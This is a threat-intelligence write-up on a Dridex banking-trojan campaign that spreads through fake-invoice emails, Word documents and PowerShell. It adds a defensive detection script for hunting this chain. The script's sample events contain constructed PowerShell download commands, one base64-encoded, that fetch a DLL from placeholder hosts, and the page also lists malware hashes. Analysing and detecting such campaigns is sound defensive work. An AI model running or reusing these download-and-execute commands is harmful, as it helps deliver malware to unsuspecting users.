Cybercrime, new Dridex global campaign via false invoices

Technical analysis by the malware hunter JAMESWT
New global Dridex campaign with the lure of false invoices. The email contains a link that downloads a Word file, which then downloads a DLL and infects the machine with malware. The attachment, however, uses the same template as Emotet.
Dridex is hiding behind a new cybercrime malspam campaign, which uses false invoices to deliver the banking trojan in many countries. The text, written in English, refers to a payment and includes a link. This leads to the download of a Word document on the victim’s computer, which contacts some malicious links and downloads a DLL. This starts the malware infection chain. Furthermore, each email contains a different link. If, however, it is detected that the Doc has already been downloaded previously, the user is redirected to another site (https://www.solvay[.com/en/). Moreover, the attachment uses the same template as the Emotet Doc.
The email text
The Word attachment from which the DLL that infects the computer with malware is downloaded
Emotet template variant
The urls contacted by the DOC to download the Dridex DLL
The PowerShell launched by the Doc with the urls inside
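The chain described above (Word document launching PowerShell that carries the download URLs) can be hunted in process-creation telemetry. The following is an added example, not code from the original analysis: the event field names are modeled on Sysmon process-creation records, the sample events and `example.test` hosts are constructed, and handling of `-EncodedCommand` is an assumption beyond what the page states.

```python
import base64
import re

# Assumption: events are dicts shaped like Sysmon process-creation records.
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"|,;)]+", re.IGNORECASE)
# Covers -e / -enc / -EncodedCommand; other abbreviations are not handled here.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def expand_command(cmdline):
    """Command line plus any decoded -EncodedCommand payload (base64 of UTF-16LE)."""
    parts = [cmdline]
    for blob in ENC_RE.findall(cmdline):
        try:
            parts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not a valid encoded command; keep the raw text only
    return "\n".join(parts)

def find_doc_downloaders(events):
    """Flag Office -> PowerShell launches and list the URLs the script carries."""
    hits = []
    for ev in events:
        if basename(ev["parent_image"]) in OFFICE_PARENTS and basename(ev["image"]) in SHELLS:
            urls = sorted(set(URL_RE.findall(expand_command(ev["command_line"]))))
            hits.append({"host": ev["host"], "urls": urls})
    return hits

# Constructed sample events (example.test hosts are placeholders, not campaign IOCs).
_script = "(New-Object Net.WebClient).DownloadFile('https://c.example.test/z3.pdf','C:\\Users\\Public\\z3.dll')"
_enc = base64.b64encode(_script.encode("utf-16-le")).decode()
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": WORD, "image": PS,
     "command_line": "powershell -w hidden -c \"$u='https://a.example.test/x1.rar','https://b.example.test/y2.zip'\""},
    {"host": "ws-02", "parent_image": WORD, "image": PS,
     "command_line": "powershell -NoP -enc " + _enc},
    {"host": "ws-03", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell -c \"iwr https://intranet.example.test/tool.ps1\""},
    {"host": "ws-04", "parent_image": WORD, "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for hit in find_doc_downloaders(SAMPLE_EVENTS):
        print(hit["host"], hit["urls"])
```

The extracted URLs can then be compared against proxy or DNS logs to see which hosts actually fetched the second stage.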
The IOCs
Some Doc Urls
Dll Urls
Doc MD5
Payload MD5
fb4d330648556b4e4b6ae9daf2b7506e
3b686bf0afdd4bf9dc6f956a28444eab
Ps1 MD5
37ea083c5ed179440295c26791060792
b9c2d005d2619f1122f5032b84a1d2bf